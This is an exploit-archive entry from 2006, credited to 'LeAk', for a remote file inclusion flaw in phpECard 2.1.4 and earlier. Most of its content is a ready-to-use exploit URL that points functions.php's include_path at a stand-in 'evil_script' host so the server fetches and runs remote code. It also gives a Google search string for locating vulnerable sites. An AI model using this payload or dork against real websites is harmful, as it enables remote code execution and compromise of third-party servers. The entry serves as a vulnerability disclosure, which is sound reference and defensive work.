phpECard <= 2.1.4 (functions.php) Remote File Include Vulnerability

2006-08-29T00:00:00
ID 1337DAY-ID-760
Type zdt
Reporter LeAk
Modified 2006-08-29T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===================================================================
phpECard <= 2.1.4 (functions.php) Remote File Include Vulnerability
===================================================================


#==============================================================================================
# phpECard (functions.php) Remote File Inclusion Exploit
#===============================================================================================
#                                                                          
#Critical Level : Dangerous                                                
#          
#Google Search: powered by: phpecard                                                                                                                          
#                                                             
#================================================================================================
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/functions.php?include_path=http://evil_script?
#
#
#================================================================================================
#Discoverd By : LeAk
#
# Turkis Hackers
==================================================================================================



#  0day.today [2018-01-05]  #